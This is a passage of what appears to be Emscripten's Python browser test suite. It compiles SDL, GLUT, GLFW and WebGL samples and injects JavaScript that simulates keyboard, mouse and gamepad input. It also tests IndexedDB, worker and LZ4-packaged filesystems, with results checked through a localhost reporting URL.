copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test a .js target with --proxy-to-worker; this emits 2 js files, the client and the worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut']).communicate()
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
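# Exercise key events across a small matrix of builds: immediate vs. setTimeout-delayed event dispatch,
# the default handler vs. -DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER, and a normal build vs. an
# emterpreter-async build that sleeps (-DTEST_SLEEP).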
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//out('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//out('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate sending the keypress event only when the
// prior keydown event was not default-prevented.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
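# Like test_sdl_mouse, but the simulated events use page coordinates directly (no canvas offsets are
# added in pre.js) and the canvas is positioned with CSS offsets inside a custom page, exercising the
# -DTEST_SDL_MOUSE_OFFSETS code path.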
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear any text left over from a previous run
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support for the attributes we want to test in the WebGL implementation
# (request the attribute, create a context, and then check its value in the resulting context attributes).
# Tests still succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
@unittest.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
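# Run the same program three times against the same origin: the first run (-DFIRST, with moar.txt
# preloaded) persists `secret`, the second reads the persisted value back without any preloaded file,
# and the third still reads the persisted value even though a different moar.txt is preloaded.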
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
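# Mount WORKERFS with one Blob and one File and verify both can be read from C code, with the whole
# program running in a worker via --proxy-to-worker.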
secret = 'a' * 10
secret2 = 'b' * 10
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc; -s LZ4=1 makes emcc pass the LZ4 option on to the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
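# sanity check: the three inputs total 3 * 1024 * 128 * 10 + 1 bytes, and the LZ4-packaged test.data
# should come out to well under half of that raw size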
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3 * 1024 * 128 * 10 + 1
assert os.stat('test.data').st_size < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server; the client receives compressed data and can just use it. This is the typical usage.
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
open('data.dat', 'w').write(' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
